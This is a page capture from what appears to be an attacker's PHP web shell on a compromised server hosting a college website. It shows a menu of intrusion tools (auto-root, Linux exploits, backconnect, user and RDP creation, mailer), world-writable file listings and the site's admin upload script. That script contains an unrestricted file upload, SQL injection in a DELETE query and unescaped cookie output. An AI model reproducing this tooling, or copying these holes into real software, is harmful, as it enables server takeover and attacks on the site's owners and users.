Linux uiet.co.in 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.0.165 | : 216.73.216.215
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.25
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
ubschool.org.in /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxrwxrwx
assets
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
font-awesome
[ DIR ]
drwxrwxrwx
form
[ DIR ]
drwxrwxrwx
icons
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
limsysuim
[ DIR ]
drwxrwxrwx
photo_gallery
[ DIR ]
drwxrwxrwx
uploads
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.htaccess
77
B
-rw-r--r--
accredition.php
8.81
KB
-rwxrwxrwx
admissions.php
12.19
KB
-rwxrwxrwx
aict_approval.php
9.34
KB
-rwxrwxrwx
alumni.php
10.09
KB
-rwxrwxrwx
banner.php
714
B
-rwxrwxrwx
cafeteria.php
9.38
KB
-rwxrwxrwx
calender.php
11.11
KB
-rwxrwxrwx
contact.php
8.96
KB
-rwxrwxrwx
courses.php
10.46
KB
-rwxrwxrwx
faculties.php
11.13
KB
-rwxrwxrwx
fees_structure.php
9.03
KB
-rwxrwxrwx
footer.php
5.78
KB
-rwxrwxrwx
footer_conct.php
467
B
-rwxrwxrwx
gallery.php
8.78
KB
-rwxrwxrwx
governbody.php
14.42
KB
-rwxrwxrwx
gutter.php
3.08
KB
-rwxrwxrwx
header.php
11.08
KB
-rwxrwxrwx
hostel.php
10.03
KB
-rwxrwxrwx
index.php
70.08
KB
-rwxrwxrwx
index_style.php
903
B
-rwxrwxrwx
industry.php
9.28
KB
-rwxrwxrwx
infrastructure.php
9.91
KB
-rwxrwxrwx
lession_plan_branch.php
11.2
KB
-rwxrwxrwx
library.php
10.6
KB
-rwxrwxrwx
mandatorydisclosure1.php
8.67
KB
-rwxrwxrwx
mission_vision.php
10.74
KB
-rwxrwxrwx
mou.php
9.13
KB
-rwxrwxrwx
msg.php
10.63
KB
-rwxrwxrwx
notice.php
10.24
KB
-rwxrwxrwx
overview.php
8.36
KB
-rwxrwxrwx
results.php
11.09
KB
-rwxrwxrwx
right_section.php
2.81
KB
-rwxrwxrwx
rti.php
9.1
KB
-rwxrwxrwx
skillcourses.php
9.57
KB
-rwxrwxrwx
student_welfare.php
9.14
KB
-rwxrwxrwx
students_projects.php
12.56
KB
-rwxrwxrwx
stuproject.php
9.62
KB
-rwxrwxrwx
syllabus.php
10.2
KB
-rwxrwxrwx
why_join_us.php
10.06
KB
-rwxrwxrwx
zzz_test.php
38
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stuproject.php
<?php include("../includes/connection.php"); include('SimpleImage.php'); $page1='gallery'; /* EDIT Template */ if(isset($_POST['submit'])){ $title=$_POST['title']; if($_FILES['photo']['name']) { $directory_path = "../photo_gallery/"; $poiname = "hmbg_".rand(1,99999999).basename($_FILES['photo']['name']); /*$poiname = "../collegeadmin/Gallery_images/"."gallery_".rand(1,99999999).basename($_FILES['user_image']['name']);*/ move_uploaded_file($_FILES['photo']['tmp_name'],$directory_path.$poiname); $image = new SimpleImage(); $image->load("".$poiname); $image->resize(1200,500); $image->save("".$poiname); $sql="INSERT INTO stuproject SET photo='$poiname' "; $update=db_query($sql); } header("location:stuproject.php"); } if(isset($_REQUEST['ids'])){ $id=$_REQUEST['ids']; $sql="DELETE FROM stuproject where id='$id'"; $query_insert = db_query( $sql ); header("location:mng_photo_gallery.php"); } ?> <?php //$abc=$_REQUEST['msg']; //echo $abc; ?> <!DOCTYPE html> <html lang="en"> <head> <?php include("css.php"); ?> <script src="tinymce/tinymce.min.js" referrerpolicy="origin"></script> <script> tinymce.init({ selector: '#buyers,#sellers,#content', height: 300, plugins: 'print preview paste importcss searchreplace autolink autosave save directionality code visualblocks visualchars fullscreen image link media template codesample table charmap hr pagebreak nonbreaking anchor toc insertdatetime advlist lists wordcount imagetools textpattern noneditable help charmap emoticons', menubar: 'file edit view insert format tools table help', toolbar: 'undo redo | bold italic underline strikethrough | fontselect fontsizeselect formatselect | alignleft aligncenter alignright alignjustify | outdent indent | numlist bullist | forecolor backcolor removeformat | pagebreak | charmap emoticons | fullscreen preview save print | insertfile image media template link anchor codesample | ltr rtl', toolbar_sticky: false, image_advtab: true, external_filemanager_path:"filemanager/", filemanager_title:"Filemanager" , external_plugins: { "filemanager" : "../filemanager/plugin.min.js"}, content_css: [ '//fonts.googleapis.com/css?family=Lato:300,300i,400,400i', '//www.tiny.cloud/css/codepen.min.css' ], extended_valid_elements: 'span[class=]', importcss_append: false, }); function chnageLang(val){ self.location = 'stuproject.php'; } </script> </head> <body class="sidebar-pinned"> <?php include("left.php") ?> <main class="admin-main"> <!--site header begins--> <?php include("admin_header.php");?> <!--site header ends --> <section class="admin-content "> <div class="bg-dark"> <div class="container m-b-30"> <div class="row"> <div class="col-12 text-white p-t-40 p-b-90"> <h4 class="">Manage Student Project</h4> <p class="opacity-75 "></p> </div> </div> </div> </div> <div class="container pull-up"> <div class="row" style="margin: 0 auto; width:100%; align-items: center; justify-content: center;"> <!--message--> <?php if ($_COOKIE['msg']) { ?> <div class="clearfix"></div> <div class="col-lg-8"> <div class="alert alert-success"> <a href="#" class="close" data-dismiss="alert" onClick="$('.alert').hide('slow');">×</a> <?php print str_replace("+", " ", $_COOKIE['msg']); ?> </div> </div> <?php } ?> <!--message--> <div class="col-lg-12"> <div class="card m-b-30"> <div class="card-header"> <h5 class="m-b-0"> </h5> <p class="m-b-0 text-muted"> </p> </div> <form name="pwd" method="POST" enctype="multipart/form-data" > <div class="card-body"> <div class="form-row form-group"> <label for="category">Image</label> <input type="file" class="form-control" id="bannerimage" name="photo" placeholder="Banner"> <b><font color="red"> Size : (800px X 600px)</font></b> </div> <div class="form-group"> <div class="buttoncls"> <input type="submit" name="submit" value="Submit" class="btn btn-primary"> </div> </div> </div> </form> <div class="col-lg-12"> <div class="card m-b-30"> <div class="card-header"> <h5 class="m-b-0"> Gallery Details </h5> </div> <div class="card-body"> <div class="table-responsive"> <table class="table table-hover"> <thead> <tr> <th>#</th> <th>Title</th> <th>Feature Image</th> <th class="text-center" style="width:240px;">Action</th> </tr> </thead> <tbody> <?php $i=1; $sqlfetch = "SELECT * FROM stuproject"; $sqlfetch = db_query($sqlfetch); $i = 1; while ($row = mysqli_fetch_assoc($sqlfetch)) { ?> <tr> <td><?php echo $i; ?></td> <td><?php echo $row['title']; ?></td> <td><img src="../photo_gallery/<?php echo $row["photo"];?>" style="max-width: 150px"></td> <td class="text-center"> <a href="#" onClick="delete_data(<?php echo $row['id']; ?>)"><i class="mdi mdi-delete-forever"></i></a></td> </td> </tr> <?php $i++; } ?> </tbody> </table> </div> <script> function delete_data(vals){ var a=confirm("Do you want to delete?"); if(a){ window.location="stuproject.php?ids="+vals; } } </script> </div> </div> </div> </div> </div> </section> </main> <?php include("js.php"); ?> <!--Additional Page includes--> <script src="assets/vendor/apexchart/apexcharts.min.js"></script> <!--chart data for current dashboard--> <script src="assets/js/dashboard-01.js" type="text/javascript"></script> <script src="https://www.google.com/recaptcha/api.js?render=<?php print $sitekey; ?>"></script> <script> grecaptcha.ready(function () { grecaptcha.execute('<?php print $sitekey; ?>',{action:'login'}).then(function(token){ var recaptchaResponse = document.getElementById('recaptchaResponse'); recaptchaResponse.value = token; }); }); </script> </body> </html>
Close